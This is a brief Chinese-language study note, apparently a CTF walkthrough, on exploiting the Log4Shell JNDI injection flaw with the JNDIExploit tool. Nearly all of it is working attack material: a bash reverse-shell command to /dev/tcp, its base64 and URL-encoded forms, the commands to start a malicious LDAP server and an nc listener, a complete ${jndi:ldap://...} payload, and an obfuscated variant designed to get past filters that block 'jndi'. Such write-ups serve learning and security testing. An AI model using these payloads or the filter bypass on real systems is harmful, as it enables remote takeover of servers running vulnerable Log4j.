聲明:
該文章來自本人日常學習筆記,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與本人無關
JNDIExploit
先將反彈shell的命令base64編碼,然后將里面的+號和=號進行一次url編碼
注:IP填vps公網ip,PORT要和nc監聽的端口對應
bash -i >& /dev/tcp/IP/PORT 0>&1
# => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE=
# => YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D
然后啟動JNDIExploit
java -jar JNDIExploit.jar -i ip -l 1389 -p 8180
用nc監聽端口
nc -lvnp port
payload:
${jndi:ldap://ip:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D}
將payload注入后shell會被反彈到nc監聽的端口上
拿到shell后cd到根目錄后ls看到flag文件
cat之即可拿到flag
補充:
# 如果jndi被屏蔽,繞過方法
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://ip:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D
}